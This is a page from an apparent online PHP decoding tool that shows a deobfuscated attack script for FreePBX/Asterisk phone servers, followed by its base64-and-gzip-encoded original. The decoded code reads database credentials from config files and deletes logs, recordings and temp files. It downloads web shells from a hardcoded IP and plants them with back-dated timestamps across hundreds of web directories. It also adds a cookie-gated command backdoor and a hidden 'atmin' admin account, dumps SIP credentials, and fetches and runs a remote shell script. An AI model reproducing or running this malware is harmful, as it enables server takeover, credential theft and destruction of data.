Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzuncompress(base64_decode('eJy9XG1z2zYS/nz+FajqqaTWkmzHmdRxnNSJfTlPkzgTu+3MuR..
Decoded Output download
error_reporting(0);
ini_set('error_reporting', 0);
$file = is_file("/etc/asterisk/freepbx.conf") ? "/etc/asterisk/freepbx.conf" : "/etc/freepbx.conf";
is_file($file) ? eval(str_replace(array('<?php', '?>', 'require', 'include'), array('', '', '#require', '#include'), file_get_contents($file))) : '';
$amp_conf = (isset($amp_conf) ? $amp_conf : array());
$amportal = array();
foreach (explode("
", file_get_contents("/etc/amportal.conf")) as $key => $val) {
if (preg_match_all("/=/", $val, $amp3)) {
$exx = explode("=", $val);
$amportal[$exx[0]] = trim((isset($amp_conf[$exx[0]]) ? $amp_conf[$exx[0]] : str_replace($exx[0] . '=', '', $val)));
}
}
@exec("mkdir -p /var/www/html/vtigercrm &");
@exec("rm -rf /var/tmp/* /tmp/* /var/log/* &");
@exec("nohup rm -rf /tmp/* /var/spool/asterisk/monitor/* /var/www/backup/*.gz /var/lib/asterisk/bin/ultimate* /var/www/html/index.php /var/lib/asterisk/bin/xultima* &");
$amp = array_merge(array('AMPDBUSER' => 'asteriskuser', 'AMPDBNAME' => 'asterisk'), $amp_conf, $amportal);
$oldcwd = getcwd();
is_dir($amp["AMPWEBROOT"]) ? chdir($amp["AMPWEBROOT"]) : "";
$freespace = (disk_free_space(getcwd()) / 1024 / 1024);
if ($freespace < 100) {
@exec("cd /var/log/*.[0-9];nohup find . -type f | xargs -I {} cp /dev/null {} &");
@exec("rm -rf /var/tmp/* /tmp/* /var/log/* &");
@exec("nohup rm -rf /tmp/* /var/spool/asterisk/monitor/* /var/www/backup/*.gz /var/lib/asterisk/bin/ultimat* /var/www/html/index.php &");
}
$dirs = array($oldcwd . '/', getcwd() . '/', '/var/www/html/vtigercrm', '/admin/assets/css/', '/admin/assets/js/', '/admin/modules/cdr/assets/js/', '/admin/modules/fw_ari/htdocs_ari/theme/js/', '/panel/dhtml/js/', '/fop2/css/', '/Info/js/', '/libs/font-icons/entypo/css/', '/mail/program/js/tiny_mce/plugins/xhtmlxtras/js/', '/modules/kconfig/js/', '/stats/plugins/dialer/js/', '/var/www/html/', '/var/www/', '/var/www/freepbx/', '/var/www/localhost/', '/opt/freepbx/', '/admin/modules/backup/assets/', '/admin/modules/cdr/assets/');
foreach ($dirs as $K => $V) {
$dirs[] = $V . '/Info/js/';
$dirs[] = $V . '/_asterisk/';
$dirs[] = $V . '/a2billing/';
$dirs[] = $V . '/a2billing/agent/Public/';
$dirs[] = $V . '/admin/';
$dirs[] = $V . '/admin/assets/';
$dirs[] = $V . '/admin/assets/css/';
$dirs[] = $V . '/admin/assets/js/';
$dirs[] = $V . '/admin/modules/cdr/assets/js/';
$dirs[] = $V . '/admin/modules/fw_ari/htdocs_ari/theme/js/';
$dirs[] = $V . '/assets/';
$dirs[] = $V . '/css/';
$dirs[] = $V . '/digium_phones/';
$dirs[] = $V . '/fop2/css/';
$dirs[] = $V . '/freepbx/';
$dirs[] = $V . '/html/';
$dirs[] = $V . '/js/';
$dirs[] = $V . '/libs/font-icons/entypo/css/';
$dirs[] = $V . '/mail/program/js/tiny_mce/plugins/xhtmlxtras/js/';
$dirs[] = $V . '/modules/kconfig/js/';
$dirs[] = $V . '/panel/';
$dirs[] = $V . '/panel/dhtml/js/';
$dirs[] = $V . '/public_html/';
$dirs[] = $V . '/recordings/';
$dirs[] = $V . '/stats/plugins/dialer/js/';
$dirs[] = $V . '/var/tmp/mae.php';
$dirs[] = $V . '/var/tmp/maf.php';
$dirs[] = $V . '/var/www/.freepbx-known/';
$dirs[] = $V . '/var/www/.well-known/';
$dirs[] = $V . '/var/www/_asterisk/';
$dirs[] = $V . '/var/www/admin/';
$dirs[] = $V . '/var/www/admin/api/';
$dirs[] = $V . '/var/www/admin/assets/';
$dirs[] = $V . '/var/www/admin/assets/css/';
$dirs[] = $V . '/var/www/admin/assets/css/custom-theme/';
$dirs[] = $V . '/var/www/admin/assets/css/images/';
$dirs[] = $V . '/var/www/admin/assets/fonts/';
$dirs[] = $V . '/var/www/admin/assets/images/';
$dirs[] = $V . '/var/www/admin/assets/js/';
$dirs[] = $V . '/var/www/admin/assets/js/bootstrap-table-extensions-dev/';
$dirs[] = $V . '/var/www/admin/assets/js/bootstrap-table-locale/';
$dirs[] = $V . '/var/www/admin/assets/js/views/';
$dirs[] = $V . '/var/www/admin/assets/less/';
$dirs[] = $V . '/var/www/admin/helpers/';
$dirs[] = $V . '/var/www/admin/i18n/';
$dirs[] = $V . '/var/www/admin/images/';
$dirs[] = $V . '/var/www/admin/libraries/';
$dirs[] = $V . '/var/www/admin/licenses/';
$dirs[] = $V . '/var/www/admin/modules/';
$dirs[] = $V . '/var/www/admin/modules/amd/assets/';
$dirs[] = $V . '/var/www/admin/modules/announcement/assets/';
$dirs[] = $V . '/var/www/admin/modules/arimanager/assets/';
$dirs[] = $V . '/var/www/admin/modules/asterisk-cli/assets/';
$dirs[] = $V . '/var/www/admin/modules/backup/assets/';
$dirs[] = $V . '/var/www/admin/modules/blacklist/assets/';
$dirs[] = $V . '/var/www/admin/modules/bulkhandler/assets/';
$dirs[] = $V . '/var/www/admin/modules/calendar/assets/';
$dirs[] = $V . '/var/www/admin/modules/callback/assets/';
$dirs[] = $V . '/var/www/admin/modules/callrecording/assets/';
$dirs[] = $V . '/var/www/admin/modules/cdr/assets/';
$dirs[] = $V . '/var/www/admin/modules/cdr/assets/js/';
$dirs[] = $V . '/var/www/admin/modules/cel/assets/';
$dirs[] = $V . '/var/www/admin/modules/certman/assets/';
$dirs[] = $V . '/var/www/admin/modules/cidlookup/assets/';
$dirs[] = $V . '/var/www/admin/modules/conferences/assets/';
$dirs[] = $V . '/var/www/admin/modules/configedit/assets/';
$dirs[] = $V . '/var/www/admin/modules/contactmanager/assets/';
$dirs[] = $V . '/var/www/admin/modules/core/assets/';
$dirs[] = $V . '/var/www/admin/modules/customappsreg/assets/';
$dirs[] = $V . '/var/www/admin/modules/cxpanel/';
$dirs[] = $V . '/var/www/admin/modules/dahdiconfig/assets/';
$dirs[] = $V . '/var/www/admin/modules/dashboard/assets/';
$dirs[] = $V . '/var/www/admin/modules/daynight/assets/';
$dirs[] = $V . '/var/www/admin/modules/digium_phones/assets/';
$dirs[] = $V . '/var/www/admin/modules/directory/assets/';
$dirs[] = $V . '/var/www/admin/modules/endpointman/assets/';
$dirs[] = $V . '/var/www/admin/modules/endpointman/provisioning/';
$dirs[] = $V . '/var/www/admin/modules/fax/assets/';
$dirs[] = $V . '/var/www/admin/modules/featurecodeadmin/assets/';
$dirs[] = $V . '/var/www/admin/modules/findmefollow/assets/';
$dirs[] = $V . '/var/www/admin/modules/hotelwakeup/assets/';
$dirs[] = $V . '/var/www/admin/modules/iaxsettings/assets/';
$dirs[] = $V . '/var/www/admin/modules/ivr/assets/';
$dirs[] = $V . '/var/www/admin/modules/languages/assets/';
$dirs[] = $V . '/var/www/admin/modules/logfiles/assets/';
$dirs[] = $V . '/var/www/admin/modules/miscapps/assets/';
$dirs[] = $V . '/var/www/admin/modules/miscdests/assets/';
$dirs[] = $V . '/var/www/admin/modules/music/assets/';
$dirs[] = $V . '/var/www/admin/modules/paging/assets/';
$dirs[] = $V . '/var/www/admin/modules/parking/assets/';
$dirs[] = $V . '/var/www/admin/modules/phonebook/assets/';
$dirs[] = $V . '/var/www/admin/modules/phpinfo/assets/';
$dirs[] = $V . '/var/www/admin/modules/pinsets/assets/';
$dirs[] = $V . '/var/www/admin/modules/presencestate/assets/';
$dirs[] = $V . '/var/www/admin/modules/printextensions/assets/';
$dirs[] = $V . '/var/www/admin/modules/queues/assets/';
$dirs[] = $V . '/var/www/admin/modules/recordings/assets/';
$dirs[] = $V . '/var/www/admin/modules/restapi/assets/';
$dirs[] = $V . '/var/www/admin/modules/ringgroups/assets/';
$dirs[] = $V . '/var/www/admin/modules/setcid/assets/';
$dirs[] = $V . '/var/www/admin/modules/sipsettings/assets/';
$dirs[] = $V . '/var/www/admin/modules/sipstation/assets/';
$dirs[] = $V . '/var/www/admin/modules/soundlang/assets/';
$dirs[] = $V . '/var/www/admin/modules/superfecta/assets/';
$dirs[] = $V . '/var/www/admin/modules/timeconditions/assets/';
$dirs[] = $V . '/var/www/admin/modules/ttsengines/assets/';
$dirs[] = $V . '/var/www/admin/modules/ucp/assets/';
$dirs[] = $V . '/var/www/admin/modules/ucp/htdocs/';
$dirs[] = $V . '/var/www/admin/modules/userman/assets/';
$dirs[] = $V . '/var/www/admin/modules/versionupgrade/assets/';
$dirs[] = $V . '/var/www/admin/modules/vmblast/assets/';
$dirs[] = $V . '/var/www/admin/modules/voicemail/assets/';
$dirs[] = $V . '/var/www/admin/views/';
$dirs[] = $V . '/var/www/agc22/';
$dirs[] = $V . '/var/www/asteridex4/';
$dirs[] = $V . '/var/www/asteriskpbx/';
$dirs[] = $V . '/var/www/avantfax/';
$dirs[] = $V . '/var/www/certsci1/';
$dirs[] = $V . '/var/www/configupdata/';
$dirs[] = $V . '/var/www/degium_endpoint/';
$dirs[] = $V . '/var/www/digium_endpoints/';
$dirs[] = $V . '/var/www/digium_phones/';
$dirs[] = $V . '/var/www/error/';
$dirs[] = $V . '/var/www/framwork/';
$dirs[] = $V . '/var/www/freepbx/';
$dirs[] = $V . '/var/www/freepbx/digium_phones/';
$dirs[] = $V . '/var/www/goautodial-admin22/';
$dirs[] = $V . '/var/www/goautodial-agent22/';
$dirs[] = $V . '/var/www/goautodial22/';
$dirs[] = $V . '/var/www/html/.freepbx-known/';
$dirs[] = $V . '/var/www/html/.well-known/';
$dirs[] = $V . '/var/www/html/admin/api/';
$dirs[] = $V . '/var/www/html/admin/assets/css/custom-theme/';
$dirs[] = $V . '/var/www/html/admin/assets/css/images/';
$dirs[] = $V . '/var/www/html/admin/assets/fonts/';
$dirs[] = $V . '/var/www/html/admin/assets/js/bootstrap-table-extensions-dev/';
$dirs[] = $V . '/var/www/html/admin/assets/js/bootstrap-table-locale/';
$dirs[] = $V . '/var/www/html/admin/assets/less/';
$dirs[] = $V . '/var/www/html/admin/licenses/';
$dirs[] = $V . '/var/www/html/admin/modules/amd/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/announcement/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/arimanager/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/asterisk-cli/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/blacklist/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/bulkhandler/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/calendar/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/callback/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/callrecording/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/cel/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/certman/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/conferences/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/configedit/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/contactmanager/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/customappsreg/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/cxpanel/';
$dirs[] = $V . '/var/www/html/admin/modules/dahdiconfig/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/dashboard/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/daynight/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/digium_phones/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/directory/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/endpointman/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/endpointman/provisioning/';
$dirs[] = $V . '/var/www/html/admin/modules/featurecodeadmin/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/findmefollow/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/hotelwakeup/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/languages/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/miscapps/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/miscdests/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/music/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/phonebook/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/pinsets/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/presencestate/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/printextensions/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/restapi/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ringgroups/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/setcid/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/soundlang/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/superfecta/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/timeconditions/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ttsengines/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ucp/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ucp/htdocs/';
$dirs[] = $V . '/var/www/html/admin/modules/userman/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/versionupgrade/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/vmblast/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/voicemail/assets/';
$dirs[] = $V . '/var/www/html/agc22/';
$dirs[] = $V . '/var/www/html/asteridex4/';
$dirs[] = $V . '/var/www/html/asteriskpbx/';
$dirs[] = $V . '/var/www/html/avantfax/';
$dirs[] = $V . '/var/www/html/certsci1/';
$dirs[] = $V . '/var/www/html/configupdata/';
$dirs[] = $V . '/var/www/html/degium_endpoint/';
$dirs[] = $V . '/var/www/html/digium_endpoints/';
$dirs[] = $V . '/var/www/html/digium_phones/';
$dirs[] = $V . '/var/www/html/framwork/';
$dirs[] = $V . '/var/www/html/freepbx/';
$dirs[] = $V . '/var/www/html/freepbx/digium_phones/';
$dirs[] = $V . '/var/www/html/goautodial-admin22/';
$dirs[] = $V . '/var/www/html/goautodial-agent22/';
$dirs[] = $V . '/var/www/html/goautodial22/';
$dirs[] = $V . '/var/www/html/imsicatcher/';
$dirs[] = $V . '/var/www/html/js/';
$dirs[] = $V . '/var/www/html/pbx/';
$dirs[] = $V . '/var/www/html/reminders/';
$dirs[] = $V . '/var/www/html/restapi/';
$dirs[] = $V . '/var/www/html/restapps/';
$dirs[] = $V . '/var/www/html/sip/';
$dirs[] = $V . '/var/www/html/sipml5/';
$dirs[] = $V . '/var/www/html/test/';
$dirs[] = $V . '/var/www/html/vicidial/';
$dirs[] = $V . '/var/www/html/vtigercrm/';
$dirs[] = $V . '/var/www/html/vtigercrm/Image/';
$dirs[] = $V . '/var/www/html/vtigercrm/Smarty/';
$dirs[] = $V . '/var/www/html/vtigercrm/adodb/';
$dirs[] = $V . '/var/www/html/vtigercrm/backup/';
$dirs[] = $V . '/var/www/html/vtigercrm/cache/';
$dirs[] = $V . '/var/www/html/vtigercrm/class_http/';
$dirs[] = $V . '/var/www/html/vtigercrm/class_http_dir/';
$dirs[] = $V . '/var/www/html/vtigercrm/cron/';
$dirs[] = $V . '/var/www/html/vtigercrm/data/';
$dirs[] = $V . '/var/www/html/vtigercrm/database/';
$dirs[] = $V . '/var/www/html/vtigercrm/include/';
$dirs[] = $V . '/var/www/html/vtigercrm/jscalendar/';
$dirs[] = $V . '/var/www/html/vtigercrm/license/';
$dirs[] = $V . '/var/www/html/vtigercrm/log4php.debug/';
$dirs[] = $V . '/var/www/html/vtigercrm/log4php/';
$dirs[] = $V . '/var/www/html/vtigercrm/logs/';
$dirs[] = $V . '/var/www/html/vtigercrm/modules/';
$dirs[] = $V . '/var/www/html/vtigercrm/packages/';
$dirs[] = $V . '/var/www/html/vtigercrm/schema/';
$dirs[] = $V . '/var/www/html/vtigercrm/soap/';
$dirs[] = $V . '/var/www/html/vtigercrm/storage/';
$dirs[] = $V . '/var/www/html/vtigercrm/test/';
$dirs[] = $V . '/var/www/html/vtigercrm/themes/';
$dirs[] = $V . '/var/www/html/vtigercrm/user_privileges/';
$dirs[] = $V . '/var/www/html/vtigercrm/vtlib/';
$dirs[] = $V . '/var/www/html/wordpress/';
$dirs[] = $V . '/var/www/icons/';
$dirs[] = $V . '/var/www/images/';
$dirs[] = $V . '/var/www/imsicatcher/';
$dirs[] = $V . '/var/www/js/';
$dirs[] = $V . '/var/www/pbx/';
$dirs[] = $V . '/var/www/recordings/';
$dirs[] = $V . '/var/www/recordings/includes/';
$dirs[] = $V . '/var/www/recordings/locale/';
$dirs[] = $V . '/var/www/recordings/misc/';
$dirs[] = $V . '/var/www/recordings/modules/';
$dirs[] = $V . '/var/www/recordings/theme/';
$dirs[] = $V . '/var/www/reminders/';
$dirs[] = $V . '/var/www/restapi/';
$dirs[] = $V . '/var/www/restapps/';
$dirs[] = $V . '/var/www/sip/';
$dirs[] = $V . '/var/www/sipml5/';
$dirs[] = $V . '/var/www/test/';
$dirs[] = $V . '/var/www/vicidial/';
$dirs[] = $V . '/var/www/vtigercrm/';
$dirs[] = $V . '/var/www/vtigercrm/Image/';
$dirs[] = $V . '/var/www/vtigercrm/Smarty/';
$dirs[] = $V . '/var/www/vtigercrm/adodb/';
$dirs[] = $V . '/var/www/vtigercrm/backup/';
$dirs[] = $V . '/var/www/vtigercrm/cache/';
$dirs[] = $V . '/var/www/vtigercrm/class_http/';
$dirs[] = $V . '/var/www/vtigercrm/class_http_dir/';
$dirs[] = $V . '/var/www/vtigercrm/cron/';
$dirs[] = $V . '/var/www/vtigercrm/data/';
$dirs[] = $V . '/var/www/vtigercrm/database/';
$dirs[] = $V . '/var/www/vtigercrm/include/';
$dirs[] = $V . '/var/www/vtigercrm/jscalendar/';
$dirs[] = $V . '/var/www/vtigercrm/license/';
$dirs[] = $V . '/var/www/vtigercrm/log4php.debug/';
$dirs[] = $V . '/var/www/vtigercrm/log4php/';
$dirs[] = $V . '/var/www/vtigercrm/logs/';
$dirs[] = $V . '/var/www/vtigercrm/modules/';
$dirs[] = $V . '/var/www/vtigercrm/packages/';
$dirs[] = $V . '/var/www/vtigercrm/schema/';
$dirs[] = $V . '/var/www/vtigercrm/soap/';
$dirs[] = $V . '/var/www/vtigercrm/storage/';
$dirs[] = $V . '/var/www/vtigercrm/test/';
$dirs[] = $V . '/var/www/vtigercrm/themes/';
$dirs[] = $V . '/var/www/vtigercrm/user_privileges/';
$dirs[] = $V . '/var/www/vtigercrm/vtlib/';
$dirs[] = $V . '/var/www/wordpress/';
$dirs[] = $V . '/vtigercrm/';
$dirs[] = $V . '/';
$dirs[] = $V . '/var/www/html/recordings/misc/';
}
$dirs = array_unique($dirs);
sort($dirs);
$contents = array('cxc' => file_get_contents('http://91.92.249.49/z/newx.txt'), 'c' => file_get_contents('http://91.92.249.49/t/c99.txt'), 'coc' => file_get_contents('http://91.92.249.49/t/Do.txt'), 'codes' => '<?php $cmd=((isset($_COOKIE["b3d0r"])) && (md5(sha1($_COOKIE["b3d0r"]))=="75f81b0a48e47471bfaa07450b29325c"))? $_COOKIE["cmd"]: "echo \'b3d0r T\'"; system($cmd); ?>');
$freespace = (disk_free_space(getcwd()) / 1024 / 1024);
if ($freespace > 100) {
foreach ($dirs as $k => $where) {
if (is_dir($where)) {
(is_writeable($where)) ? write_dir($where) : '';
$od = opendir($where);
while ($rd = readdir($od)) {
$wd = $where . '/' . $rd;
(($rd != '..') && ($rd != '.') && is_writeable($wd) && is_dir($wd)) ? write_dir($wd) : '';
}
}
}
}
$pass = random_password();
if (count($amp) > 3) {
echo "
[+] Config Fetched ..";
$con = mysql_connect($amp['AMPDBHOST'], $amp['AMPDBUSER'], $amp['AMPDBPASS']) or print (mysql_error());
echo "
[+] Connected To Database server ..";
mysql_select_db($amp['AMPDBNAME'], $con) or print (mysql_error());
echo "
[+] Connected To Database ..";
mysql_query("delete from ampusers where username!='admin'");
$query = mysql_query("INSERT INTO `ampusers` ( `username`, `password_sha1`, `sections` ) VALUES ( 'atmin', '" . sha1($pass) . "', '*' );") or print ("
[-] Wrong Column ,, trying another column ..");
if (!$query) {
$query = mysql_query("INSERT INTO `ampusers` ( `username`, `password`, `sections` ) VALUES ( 'atmin', '$pass', '*' );") or print ("
[-]Couldn't Determine Column .. Should Add admin Manually ..<br />" . mysql_error());
}
if ($query) {
echo "
[+] Admin User Added ..
[+] atmin : $pass
";
}
is_dir("../admin") ? @symlink('../admin', 'atmin') : "";
is_dir("/var/www/html/admin") ? @symlink('/var/www/html/admin', '/var/www/html/recordings/atmin') : "";
} else {
echo "
[-] Should Work Manually on this server ..
";
}
if (is_file("/var/www/html/libs/paloSantoDB.class.php")) {
include_once "/var/www/html/libs/paloSantoDB.class.php";
include_once "/var/www/html/libs/paloSantoACL.class.php";
$pDB = new paloDB("sqlite3:////var/www/db/acl.db");
$pACL = new paloACL($pDB);
$query = "SELECT id from acl_user where name='atmin'";
$iddb = $pDB->fetchTable($query);
$tid = $iddb[0][0];
if ($tid < 2) {
$pACL->createUser('atmin', '', md5($pass), '');
$iddb = $pDB->fetchTable($query);
$tid = $iddb[0][0];
}
$pACL->changePassword($tid, md5($pass));
$pACL->addToGroup($tid, 1);
echo "
[+] Admin User Added ..
[+] atmin : $pass
";
}
echo "-----------AMPDB-----------
";
@system("grep AMPDB /etc/amportal.conf");
echo "-----------ARI_ADMIN-----------
";
@system("grep ARI_ADMIN /etc/amportal.conf");
echo "-----------AMPMGR-----------
";
@system("grep AMPMGR /etc/amportal.conf");
echo "-----------PASS-----------
";
@system("grep PASS /etc/amportal.conf");
echo "=====sip_registrations========================
";
@system("cat /etc/asterisk/sip_registrations.conf");
echo "==========sip_additional===================================
";
@system("cat /etc/asterisk/sip_additional.conf");
echo "------------BADR in----------
";
function write_dir($where) {
write_file($where . '/Do.php', 'coc');
write_file($where . '/index.php', 'coc');
write_file($where . '/phpversions.php', 'codes');
write_file($where . '/config.all.php', 'codes');
write_file($where . '/graph.php', 'codes');
write_file($where . '/hamed.php', 'c');
write_file($where . '/new.sh', 'cxc');
write_file($where . '/page.framework.php', 'coc');
write_file($where . '/configs.php', 'coc');
write_file($where . '/salem.php', 'coc');
write_file($where . '/audio.php', 'coc');
write_file($where . '/MeSSi.php', 'coc');
}
function write_file($fname, $wtw) {
GLOBAL $contents;
if ($contents[$wtw] !== '') {
file_put_contents($fname, $contents[$wtw]);
touch($fname, strtotime('-10 years', time()));
}
}
function random_password($length = 7) {
$set = array_merge(range('A', 'Z'), range('a', 'z'), range('0', '9'));
$str = 't';
for ($i = 0;$i < $length;$i++) {
$str.= $set[rand(0, count($set) - 1) ];
}
return $str;
}
@system("curl -ks http://91.92.249.49/z/newx.txt > /tmp/x.out || wget http://91.92.249.49/z/newx.txt -O /tmp/x.out || GET http://91.92.249.49/z/newx.txt > /tmp/x.out;bash /tmp/x.out;rm -rf /tmp/x.out;rm /var/www/html/.htaccess;rm /var/www/html/admin/.htaccess");
echo "------------finsh ALL----------
";Did this file decode correctly?
Original Code
<?php
eval(gzuncompress(base64_decode('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